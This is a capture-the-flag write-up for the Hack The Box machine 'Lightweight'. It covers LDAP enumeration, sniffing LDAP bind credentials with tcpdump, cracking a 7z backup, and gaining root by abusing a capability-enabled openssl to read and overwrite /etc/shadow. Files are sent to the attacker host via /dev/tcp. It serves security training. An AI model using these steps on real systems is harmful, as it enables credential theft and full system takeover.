jebidiah-anthony

write-ups and what not

HTB Lightweight (10.10.10.119) MACHINE WRITE-UP


TABLE OF CONTENTS


PART 1 : INITIAL RECON

$ nmap --min-rate 700 -p- -v 10.10.10.119

  PORT    STATE SERVICE
  22/tcp  open  ssh
  80/tcp  open  http
  389/tcp open  ldap

$ nmap -oN lightweight.nmap -p22,80,389 -sC -sV -v 10.10.10.119

  PORT    STATE SERVICE VERSION
  22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
  | ssh-hostkey: 
  |   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
  |   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
  |_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
  80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
  | http-methods: 
  |_  Supported Methods: GET HEAD POST
  |_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
  |_http-title: Lightweight slider evaluation page - slendr
  389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
  | ssl-cert: Subject: commonName=lightweight.htb
  | Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
  | Issuer: commonName=lightweight.htb
  | Public Key type: rsa
  | Public Key bits: 1024
  | Signature Algorithm: sha256WithRSAEncryption
  | Not valid before: 2018-06-09T13:32:51
  | Not valid after:  2019-06-09T13:32:51
  | MD5:   0e61 1374 e591 83bd fd4a ee1a f448 547c
  |_SHA-1: 8e10 be17 d435 e99d 3f93 9f40 c5d9 433c 47dd 532f
  |_ssl-date: TLS randomness does not represent time


PART 2 : PORT ENUMERATION

TCP PORT 80 (http)

  • Landing Page:

    Landing Page

    • /info.php:
      <h1>Info</h1>
      <p><br><br>As part of our SDLC, we need to validate a new proposed configuration for our front end servers with a penetration test.</p>
      <p></p>
      <p>Real pages have been removed and a fictionary content has been updated to the site. Any functionality to be tested has been integrated.</p>
      <p></p>
      <p>This server is protected against some kinds of threats, for instance, bruteforcing. If you try to bruteforce some of the exposed services you may be banned up to 5 minutes.</p>
      <p></p>
      <p>If you get banned it's your fault, so please do not reset the box and let other people do their work while you think a different approach.</p>
      <p></p>
      <p>A list of banned IP is avaiable <a href="status.php">here</a>. You may or may not be able to view it while you are banned.</p>
      <p></p>
      <p>If you like to get in the box, please go to the <a href="user.php">user</a> page.</p>
      
    • /status.php
      <h1>List of banned IPs</h1>
      <p><i>You may or may not see this page when you are banned. </i><br><br>
      10.10.13.22 timeout 295<br>
      10.10.14.30 timeout 170<br>
      <p><i>This page has been generated at 2019/05/09 17:09:17. Data is refreshed every minute.</i></p>
      
    • /user.php
      <h1>Your account</h1>
      <p><br><br>If you did not read the info page, please go <a href="info.php">there</a> the and read it carefully.</p>
      <p></p>
      <p>This server lets you get in with ssh. Your IP (10.10.13.21) is automatically added as userid and password within a minute of your first http page request. We strongly suggest you to change your password as soon as you get in the box.</p>
      <p></p>
      <p>If you need to reset your account for whatever reason, please click <a href="reset.php">here</a> and wait (up to) a minute. Your account will be deleted and added again. Any file in your home directory will be deleted too.</p>
      

    NOTE(S):

    • The homepage has links to info, status, user
    • /info.php just gives a warning on bruteforcing
    • /status.php takes significantly longer to load than the other pages
    • /user.php creates an SSH account with your local IP as credentials
    • My local IP is 10.10.13.21

TCP PORT 22 (ssh)

  • ssh:
    $ ssh -l 10.10.13.21 10.10.10.119
    $ [email protected]'s password: 10.10.13.21
    
    $ uname -nop
    
      lightweight.htb x86_64 GNU/Linux
    
    $ cat /etc/passwd | grep bash
    
      root:x:0:0:root:/root:/bin/bash
      ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
      ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
      ...omitted...
      10.10.13.21:x:1011:1011::/home/10.10.13.21:/bin/bash
      ...omitted...
    

    NOTE(S):

    • There are two users before root – ldapuser1 and ldapuser2

TCP PORT 389 (LDAP)

  • ldapsearch:
    $ ldapsearch -b 'dc=lightweight,dc=htb' -h 10.10.10.119 -p 389 -v -x
    
      ...omitted...
      # search result
      search: 2
      result: 0 Success
       
      # numResponses: 9
      # numEntries: 8
    
    $ ldapsearch -b 'ou=People,dc=lightweight,dc=htb' -h 10.10.10.119 -p 389 -v -x
    
      # ldapuser1, People, lightweight.htb
      dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
      uid: ldapuser1
      cn: ldapuser1
      sn: ldapuser1
      mail: [email protected]
      objectClass: person
      objectClass: organizationalPerson
      objectClass: inetOrgPerson
      objectClass: posixAccount
      objectClass: top
      objectClass: shadowAccount
      userPassword:: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2Roai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv
      shadowLastChange: 17691
      shadowMin: 0
      shadowMax: 99999
      shadowWarning: 7
      loginShell: /bin/bash
      uidNumber: 1000
      gidNumber: 1000
      homeDirectory: /home/ldapuser1
       
      # ldapuser2, People, lightweight.htb
      dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
      uid: ldapuser2
      cn: ldapuser2
      sn: ldapuser2
      mail: [email protected]
      objectClass: person
      objectClass: organizationalPerson
      objectClass: inetOrgPerson
      objectClass: posixAccount
      objectClass: top
      objectClass: shadowAccount
      userPassword:: e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdmszYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x
      shadowLastChange: 17691
      shadowMin: 0
      shadowMax: 99999
      shadowWarning: 7
      loginShell: /bin/bash
      uidNumber: 1001
      gidNumber: 1001
      homeDirectory: /home/ldapuser2
       
      # search result
      search: 2
      result: 0 Success
       
      # numResponses: 4
      # numEntries: 3
    
    $ ldapsearch -b "" -h 10.10.10.113 -p 389 -LLL supportedSASLMechanisms -s base -x
    
      dn:
    
    

    NOTE(S):

    • The service allows anonymous logins
    • userPassword field has a hash encoded in base64
    • The decoded hash (SHA512CRYPT) doesn’t seem to be crackable using hashcat
    • The service doesn’t allow SASL Authentication

PART 3 : EXPLOITATION

  1. Check why /status.php takes a while to load
    1. Inside the SSH shell:
      $ ifconfig
      
        ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
                inet 10.10.10.119  netmask 255.255.255.0  broadcast 10.10.10.255
        ...omitted...
        lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
                inet 127.0.0.1  netmask 255.0.0.0
        ...omitted...
      
      $ tcpdump -i lo -nn -s0 -vv -w tcpdump.pcap 'src 10.10.10.119'
      
        tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
        Got 0
      
    2. Local terminal:
      $ curl http://10.10.10.119/status.php
      
      $ nc -lvp 4444 > tcpdump.pcap
      
    3. SSH (10.10.13.21) terminal:
        ^C11 packets captured
        22 packets received by filter
        0 packets dropped by kernel
      
      $ cat tcpdump.pcap > /dev/tcp/10.10.13.21/4444
      
    4. Open tcpdump.pcap file in Wireshark:
      • LDAP bindRequest:

        LDAP bindRequest

      • LDAP bindResponse:

        LDAP bindResponse

      NOTE(S):

      • /status.php runs an authentication sequence in LDAP
      • The bind operation is what handles authentication in LDAP
      • simple authentication was used so the password should be in plaintext
      • The authentication passed was for ldapuser2
      • The authentication password (8bc8251332abe1d7f105d3e53ad39ac2) seems to be an MD5 hash
      • The MD5 hash doesn’t seem to be crackable using hashcat

PART 4 : LATERAL MOVEMENT (10.10.13.21 -> ldapuser2)

  1. SSH (10.10.13.21) terminal:
    $ su ldapuser2
    $ Password: 8bc8251332abe1d7f105d3e53ad39ac2
    

    NOTE(S):

    • Using 8bc8251332abe1d7f105d3e53ad39ac2 as an SSH password doesn’t work
    • SSH credentials are different from UNIX credentials
  2. SSH (ldapuser2) terminal:
    $ cd ~
    $ ls -lah
    
      drwx------.  5 ldapuser2 ldapuser2  209 May  9 19:02 .
      drwxr-xr-x. 20 root      root      4.0K May  9 19:12 ..
      -rw-r--r--.  1 root      root      3.4K Jun 14  2018 backup.7z
      -rw-------.  1 ldapuser2 ldapuser2    0 Jun 21  2018 .bash_history
      -rw-r--r--.  1 ldapuser2 ldapuser2   18 Apr 11  2018 .bash_logout
      -rw-r--r--.  1 ldapuser2 ldapuser2  193 Apr 11  2018 .bash_profile
      -rw-r--r--.  1 ldapuser2 ldapuser2  246 Jun 15  2018 .bashrc
      drwxrwxr-x.  3 ldapuser2 ldapuser2   18 Jun 11  2018 .cache
      drwxrwxr-x.  3 ldapuser2 ldapuser2   18 Jun 11  2018 .config
      -rw-rw-r--.  1 ldapuser2 ldapuser2 1.5M Jun 13  2018 OpenLDAP-Admin-Guide.pdf
      -rw-rw-r--.  1 ldapuser2 ldapuser2 372K Jun 13  2018 OpenLdap.pdf
      -rw-r--r--.  1 root      root        33 Jun 15  2018 user.txt
    
    $ cat user.txt
    
      8a866d3bb7e13a57aaeb110297f48026
    
    

PART 5 : LATERAL MOVEMENT (ldapuser2 -> ldapuser1)

  1. Export backup.7z to local machine:
    • Local terminal:
      $ nc -lvp 4444 > backup.7z
      
    • SSH (ldapuser2) terminal:
      $ cat backup.7z > /dev/tcp/10.10.13.21/4444
      
  2. Extract contents of backup.7z:

    Password protected

    • Extract password hash using 7z2hashcat:
      $ git clone https://github.com/philsmd/7z2hashcat.git
      
      $ cd 7z2hashcat
      
      $ ./7z2hashcat.pl ../backup.7z > ../backup_7z_hash
      
        $7z$2$19$0$$8$11e96ba400e3926d0000000000000000$1800843918$3152$3140$1ed4a64a2e9a8bc76c59d8160d3bc3bbfd995ce02cf430ea41949ff4d745f6bf3ed238e9f06e98da3446dda53df0abf11902852e4b2a4e32e0b0f12b33af40d351b2140d6266db1a3d66e1c82fa9d516556ec893ba6841f052618ad210593b9975307b98db7e853e3ebfbef6856039647a6ad33a63f5b268fc003c39eba04484beff73264ff8c8fdb8e3bcc94ee0df4feacbba388536663f8feb8b1454890752fba4a7fba484cfd6d1d050aa6233478a2c425566d60630d985d15dae09c7485f92ea271d2087ac837b6f9101465cf4a62b0ee225245871655b1aa16526a2a5d61ab942d1418900fec9da5771da34cb8bf56ec7f05a75cf26a0202a7065b8b020769d244d95e3166fdb9f4557324e090307e91bc7adc7f56f5215ffd1463c7403c5725cbf006b46882439d629a14d4a1e25fafb202a1cfbac837eabf002f7ebfc87f20c67ff847c393a54e5724c29840016fa76be0dfbb73a79fb2ec3f0e9c7b246525acad50d76c3fe31d75004e5bc3e93ce79aab2ddbc91c7ce9666503e3ab8dcaf269d4554baee5276c516d23fabf41610ff4f666ad5cf9dc6dc3bed7e1c0a2767f018ca3cd15a35a1fbefce479b649a5db00263b55c470fcb049327e7aeb849359a74a2444de7a3c025b3a9dbfd597e0cdf642c340982b650d69f2c48b1e6b823b460734f3c6f3c1e3917b6780b0efda60ce5b7d03d55ff1fa0a161b9aa876b7498c8104f28ca6c6c629d6ca47c18e54bb237b62bd813d1cd47fdcd87b9597ddf14aec439185f8b892dedb4bcae949dbab74d72cd45dda311e0f38f219a1887bede5ec6697a8ab9f5cec687e18fd6ef2223015a3d717830f0aff0664e66ed51d185e965b55ce702135eb57f5efca251238f8e66f828c3d28d961dd09f244e735419273700e5ce97b4fa9ee3d5b45f8b81c9d5af1436e70f75dc9657354807bcadcdcf1e4f9432b29d55c21b59de59c933d0d96b0f3b89f871c14691faa63db3bdde5ca78f2c470839d49690d82f5c8334d9a857af449b1cd4c140b1087f41d09fb46baf5f0e7228716f992635e99861621d0e99d9d649ad863d99adab4ba060ef19b18a3dc2c64815401867c852ea17b01a5c551249cef2a234a1d0a91be047e06678a35ebe7256cca9791590bbfc37ee200d173f1c87a585003920ff52fc38f74da83c18284dbf171eda45fb0cba8d3ed09fc9d9e951ff95ae8b3326ec4d2cf6eaaca2890464a424f79718f044b6b7903c0f512744332f615f81e7a965df81f78ae950b98df910660b4c85bbee5b6b9b4eb061868530d1dee292296ac18e0f3081048834129583b2a7fa88573039ec01657642450688464a2e9db9bf9483d105875a30d855fe6c657a81ce5242a2a99887bdc1c786b57916b03a0d3cdddec1a0a8f94e6d9926ebf534a5b28fc4a4e16956941a5eb8718dbca21d9464a4a970b77a5967483f1373c4dc04967b16164d9d9ef6824acfcb63e20913234712b7abbc82f562aea65ef39d2bef6608d887cd5ff67966967a568a3dc21f28ad393d2ab3ca85ff7b87eebd97f80d878e616121bb94020c6fb80f3780c41dba3b4c4c3fceeba9748f4d9a47d3454b491b95bafddefd04afc8b1922e4a87534539d391fb948b59fcc1f5072c0af3c29afbbec26e2dfd7fc6d4e3a19fdb37cd49342bc7ec7526b6594295b341fe6a1a2a5f399eadade6dcb84d87fd3b00a9b79ef6c11cc01f5958a43fbdd2602eb10b4ddaa327ac043ee01c470d3ed2519488e80183043f41968f32283577cb5615de2416fcb9a74b1ce282614f818bc5adef0cb1dd6eb98d74a8d8214ec2a361b246bad656b487e8dce40f4fef808ad818c06ef5a972e2614e51e6b040f491a92ff39d55408cf92ccc0f797f27d8c1f7c5004b5613a660b6f306ba447bb99bbe5a408d00eb2dd4127351097f204e9d277a5eb97330a3d3409c7e097a18639542b1c9efe35eda1b12c1346bc8816a0430f5668a38735567ba09580504de831bb639ab1de7d2afcf2e470cbded2960f3300aca88446ccf0fa27715666e4eb45fe5d6a7a46c414d61e5fbbfd384c53e8bac6805083164332c2bd79d05c4d10436377a35b8402e186efd8959131437840c7b010d7ce74423e08bea80639414dbd0c290ced5bb1adf597b7a76141cc15d3d3054bcc4e9df234be4187725576645e86e0cfb9b7769a8cdefbec5b08d4feda04e8fd437631e181ac89deec9c54105a32776a2cb8f068177aabc375359e5b38ae4eb8cebf0668f5d104a5c5929c890c7d1de0694063943b844cd8f274b6f6bcbe004b3fe54e52905200e5b024a02498a1f767758e910516c7c295a552802e47d699cdd98adea07bd4f53f745342b990067339b9a0a2ab0c6ea2c0210961b96c7c22b2daaa322de7fddc91527d118c45d4a2a08a2c37a85a7b665ab4ba625b983019085b32096c78ed8a760c83fbf6c5811b7b16681b0a61513686d6810c72d0f1c30b792b1948a478ad660a4036fcd5dbfc57b352a22a4ed27daf1f8455aa9d81a5b8b28287fea4342c14bd42cf3159c830d322d166958a6e233ca7b9dd2914fce1f2621f95998e83df69bee22f70ae086f242690631fcd33730bb2e5ad64fa7d0b7b93931957311eeaa9b45382d020e85856e456712da51a9c220226d2a177e758ea6b7631647cc8419d04fb6b5dab40a841ba9d5660a550ac817af679f3c1a266b9c657372988ab38cfb6971695c59b5454fdf7ca1170066b99c06c985fb8564eed4caade040ef9320d5198041a2bfc62b4b21eb080520628ed3c8c8a2ffd8e0073b24c2059815da86f1b682622e714124950ff26ad79bf31897331fc23cd075fb1f4822046273b0898bebc1ba23110d74ed459c0c0f12488f0b51310f59c9dae537cdda5a75d48a4ac544531fba92fd6dbaa018cb3cc69ee4b9859f3fa1e022d4850bfd995afa9d70273789084f5955a30df3cf7de7f45c2601fe1ee0adbc89dbbd1aa23badcdfcc9d95e2bfd6f102c92bd1fb9648f446a98ab16302049f6862a0da1c758d0f0a7763e9ac0cdda94bed47f98103f8e068cd12bc83bb9a2bd2be19593d64a2f1034cdad6fbee498488a5b37efebcfe667393cf91c1a4d00082ea8463d57e691a0fb3b2394090dab00bb00d27b418b0db0171da74b6d314b78d951ec5ec87eff81800a0f41bb5eb01d5d116183667e1762c4a1d19631c05a61e1be0f05e5188da27df1a0d8697119fbe29693d776ce50c7896a3bc52888ebdcec056a4d7e675af2ea8de25f52e0470e053dd6614b3548ad0cd282a76d397b7e2fedc98d975003bd29feebc53ee5b412088599ac203cb8b6be1f3a0414511391b3495d175b3dfda7990753255ff0f13eb86ce97b5c6925aa31868523c325548720179c69e0e8df8407f5e87f263acd024cc5c4f5a75ef7a6fc1a3b650257fca20aa00674f35a07dac72471bbb500152b51dfe1743b797ad61110aa76b9fe69c0a02506ba4a6fc0b4a202efb9d88dfba38e5b5352046022cc17b57bdb40153db6b97e2f344d2c4598c0d021044eeb01423f6f6ade5702e10b63782fedddbaeba1dd9f9725eb3f85584fce2319b24851d7ec3ba2c2774741683b383ec97aadb7c912d655b6e5b147c33bb1856623b8ca08f092c0677d56e1dde99aa31ab30a654c57828536a120b4e4835ca6c7b5a2243bddfb9a00750521c74654a281cb12c806437030cd577907a797dc63a3959d47b68119a32a229899be06b7979c14b2c98e75667b8c5d30f0dfedd9553ba894ad9acda62f7f607bb35c080c3a440108ac0ce45f1873c5873488f2901790b08cb4928932a1c479d89ded5f6ce9f16c297e9dcc33c6b882b26c53b7a4f2b390367e36e384c1eb9805c0471aad4f77496e8f4fd447448dd59536629a645d04956fc30bcc686718e8d4d7cfc9ecbef3745af038de55826d328b7bad4a2eb7a10faf09c0618fd90d1941e8e3274bcd6eb2d8bed430ebfe6e8682b60390d79161f3a349c73de552d40f7421e5c4b4de80feb3998eb4ce6ecaef9bd2768e8be6534cd12ac163e70d3ed23963801c04770610c91f1ffcf4cbdf2a733f51e6fd596c855c0b905822a3838a82ea2d0e51dd442c451d05c6aa1b0099883db543927c0cc4016e27bb1b17fe863ae0c18458edbccdd6b15f0b73c3dc8c672c1bbbd81f290e9bb5291192143945d58757f64eceebd88e467d48b54a25cee7ed75263a4bb5d5597b9b5b75b6c254f81871f18246d2d91f664a0f49c1f67940d792d225272e713259f3135e5c286e081b1e2331f9217de1c0c9109d7a898458be85a4c130ea6e8c0db4dc5dbf77da5045f7da647c66e5af5676bb15221d5152da551a9390fda92e3539fde7afbd04e2e710ef28b5d5e50f2fdac106c9a18ef02414fb466f50f52b6e88e336ffe4fa929d9548630f3d7fb7d50ea590b2e3bdc3a88cf9d7f6b30f07d28ddf28c15c5371eb$4218$03
      
      $ hashcat --force -m 11600 backup_7z_hash /usr/share/wordlists/rockyou.txt
      
        $7z$2$19$0$$8$11e96ba400e3926d0000000000000000$1800843918$315...:delete
      
      
    • Examine contents of backup.7z
      • status.php
        ...omitted...
        <?php
        $username = 'ldapuser1';
        $password = 'f3ca9d298a553da117442deeb6fa932d';
        $ldapconfig['host'] = 'lightweight.htb';
        $ldapconfig['port'] = '389';
        $ldapconfig['basedn'] = 'dc=lightweight,dc=htb';
        //$ldapconfig['usersdn'] = 'cn=users';
        $ds=ldap_connect($ldapconfig['host'], $ldapconfig['port']);
        ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3);
        ldap_set_option($ds, LDAP_OPT_REFERRALS, 0);
        ldap_set_option($ds, LDAP_OPT_NETWORK_TIMEOUT, 10);
        
        $dn="uid=ldapuser1,ou=People,dc=lightweight,dc=htb";
        
        if ($bind=ldap_bind($ds, $dn, $password)) {
          echo("<p><i>You may or may not see this page when you are banned. </i><br><br>");
        } else {
          echo("Unable to bind to server.</br>");
          echo("msg:'".ldap_error($ds)."'</br>".ldap_errno($ds)."");
          if ($bind=ldap_bind($ds)) {
            $filter = "(cn=*)";
            if (!($search[email protected]ldap_search($ds, $ldapconfig['basedn'], $filter))) {
              echo("Unable to search ldap server<br>");
              echo("msg:'".ldap_error($ds)."'</br>");
            } else {
              $number_returned = ldap_count_entries($ds,$search);
              $info = ldap_get_entries($ds, $search);
              echo "The number of entries returned is ". $number_returned."<p>";
              for ($i=0; $i<$info["count"]; $i++) {
                var_dump($info[$i]);
              }
            }
          } else {
            echo("Unable to bind anonymously<br>");
            echo("msg:".ldap_error($ds)."<br>");
          }
        }
        ?>
        
        <?
        include("banned.txt")
        ?>
        ...omitted...
        

    NOTE(S):

    • The other .php files just seem to be regular source codes
    • status.php now tries to authenticate ldapuser1
  3. Switch to ldapuser1:
    $ su ldapuser1
    $ Password: f3ca9d298a553da117442deeb6fa932d
    
    $ cd ~
    

PART 6 : PRIVILEGE ESCALATION (ldapuser1 -> root)

  1. SSH (ldapuser1) terminal:
    $ ls -lah
    
      drwx------.  4 ldapuser1 ldapuser1  181 Jun 15  2018 .
      drwxr-xr-x. 21 root      root      4.0K May  9 20:10 ..
      -rw-------.  1 ldapuser1 ldapuser1    0 Jun 21  2018 .bash_history
      -rw-r--r--.  1 ldapuser1 ldapuser1   18 Apr 11  2018 .bash_logout
      -rw-r--r--.  1 ldapuser1 ldapuser1  193 Apr 11  2018 .bash_profile
      -rw-r--r--.  1 ldapuser1 ldapuser1  246 Jun 15  2018 .bashrc
      drwxrwxr-x.  3 ldapuser1 ldapuser1   18 Jun 11  2018 .cache
      -rw-rw-r--.  1 ldapuser1 ldapuser1 9.5K Jun 15  2018 capture.pcap
      drwxrwxr-x.  3 ldapuser1 ldapuser1   18 Jun 11  2018 .config
      -rw-rw-r--.  1 ldapuser1 ldapuser1  646 Jun 15  2018 ldapTLS.php
      -rwxr-xr-x.  1 ldapuser1 ldapuser1 543K Jun 13  2018 openssl
      -rwxr-xr-x.  1 ldapuser1 ldapuser1 921K Jun 13  2018 tcpdump
    
    $ getcap ~/*
    
      /home/ldapuser1/openssl =ep
      /home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
    
    

    NOTE(S):

    • capture.pcap is a tcpdump file with ldapuser2’s credentials
    • ldapTLS.php is an ldap authentication script for ldapuser1
    • openssl and tcpdump doesn’t have an SUID bit but they have capabilities
    • openssl has an empty capability set (=ep)
      Note that one can assign empty capability sets to a program file, and
      thus it is possible to create a set-user-ID-root program that changes
      the effective and saved set-user-ID of the process that executes the
      program to 0, but confers no capabilities to that process.
      
  2. Exploit openssl:
    1. Set-up an openssl server:
      $ ~/openssl req -x509 -newkey rsa:2048 -keyout /tmp/key.pem -out /tmp/cert.pem -days 365 -nodes
      
        ...omitted...
        Country Name (2 letter code) [XX]:
        State or Province Name (full name) []:
        Locality Name (eg, city) [Default City]:
        Organization Name (eg, company) [Default Company Ltd]:
        Organizational Unit Name (eg, section) []:
        Common Name (eg, your name or your server's hostname) []:
        Email Address []:
      
      $ cd /
      
      $ ~/openssl s_server -key /tmp/key.pem -cert /tmp/cert.pem -port 8888 -HTTP
      
        Using default temp DH parameters
        ACCEPT
      
      
    2. Try reading files in another SSH terminal:
      $ ssh -l 10.10.13.21 10.10.10.119
      $ [email protected]'s password: 10.10.13.21
      
      $ su ldapuser1
      $ Password: f3ca9d298a553da117442deeb6fa932d
      
      $ curl -k https://127.0.0.1:8888/etc/shadow
      
        root:$6$eVOz8tJs$xpjymy5BFFeCIHq9a.BoKZeyPReKd7pwoXnxFNOa7TP5ltNmSDsiyuS/ZqTgAGNEbx5jyZpCnbf8xIJ0Po6N8.:17711:0:99999:7:::
        ...omitted...
        ldapuser1:$6$OZfv1n9v$2gh4EFIrLW5hZEEzrVn4i8bYfXMyiPp2450odPwiL5yGOHYksVd8dCTqeDt3ffgmwmRYw49cMFueNZNOoI6A1.:17691:365:99999:7:::
        ldapuser2:$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1:17691:365:99999:7:::
        ...omitted...
      
      

      NOTE:

      • All the files in the system are now readable
    3. Create new password hash for root:
      HASH TYPE : SHA-512 / crypt(3) / $6$
      INPUT     : password
      SALT      : eVOz8tJs
      ROUNDS    : 5000
      --------------------------
      OUTPUT    : $6$eVOz8tJs$myEBoSww6zQFJjHlmrt.XN/OLwuvwMFCwZDO1x.lZhCyzjWFDjw6i6ERmiKfbDm0F.KYvQaMYHgCwTdKDzmc/.
      
    4. Create a new shadow file:
      $ vim /tmp/.etc_shadow
      
      root:$6$eVOz8tJs$myEBoSww6zQFJjHlmrt.XN/OLwuvwMFCwZDO1x.lZhCyzjWFDjw6i6ERmiKfbDm0F.KYvQaMYHgCwTdKDzmc/.:17711:0:99999:7:::
      bin:*:17632:0:99999:7:::
      daemon:*:17632:0:99999:7:::
      adm:*:17632:0:99999:7:::
      lp:*:17632:0:99999:7:::
      sync:*:17632:0:99999:7:::
      shutdown:*:17632:0:99999:7:::
      halt:*:17632:0:99999:7:::
      mail:*:17632:0:99999:7:::
      operator:*:17632:0:99999:7:::
      games:*:17632:0:99999:7:::
      ftp:*:17632:0:99999:7:::
      nobody:*:17632:0:99999:7:::
      systemd-network:!!:17689::::::
      dbus:!!:17689::::::
      polkitd:!!:17689::::::
      apache:!!:17689::::::
      libstoragemgmt:!!:17689::::::
      abrt:!!:17689::::::
      rpc:!!:17689:0:99999:7:::
      sshd:!!:17689::::::
      postfix:!!:17689::::::
      ntp:!!:17689::::::
      chrony:!!:17689::::::
      tcpdump:!!:17689::::::
      ldap:!!:17691::::::
      saslauth:!!:17691::::::
      ldapuser1:$6$OZfv1n9v$2gh4EFIrLW5hZEEzrVn4i8bYfXMyiPp2450odPwiL5yGOHYksVd8dCTqeDt3ffgmwmRYw49cMFueNZNOoI6A1.:17691:365:99999:7:::
      ldapuser2:$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1:17691:365:99999:7:::
      10.10.13.21:ux7Et3/RH9Izs:18026:0:99999:7:::
      
      :wq
      
    5. Update the /etc/shadow file:
      $ ~/openssl smime -encrypt -aes256 -in /tmp/.etc_shadow -binary -outform DER -out /tmp/shadow.enc /tmp/cert.pem
      
      $ ~/openssl smime -decrypt -in /tmp/shadow.enc -inform DER -inkey /tmp/key.pem -out /etc/shadow
      
      $ curl -k https://127.0.0.1/etc/shadow
      
        root:$6$eVOz8tJs$myEBoSww6zQFJjHlmrt.XN/OLwuvwMFCwZDO1x.lZhCyzjWFDjw6i6ERmiKfbDm0F.KYvQaMYHgCwTdKDzmc/.:17711:0:99999:7:::
        ...omitted...
        ldapuser1:$6$OZfv1n9v$2gh4EFIrLW5hZEEzrVn4i8bYfXMyiPp2450odPwiL5yGOHYksVd8dCTqeDt3ffgmwmRYw49cMFueNZNOoI6A1.:17691:365:99999:7:::
        ldapuser2:$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1:17691:365:99999:7:::
        ...omitted...
      

      NOTE:

      • The root password hash has been updated.
    6. Change User (ldapuser1 -> root):
      $ su root 
      $ Password: password
      
      # id
      
        uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
      
      # cat /root/root.txt
      
        f1d4e309c5a6b3fffff74a8f4b2135fa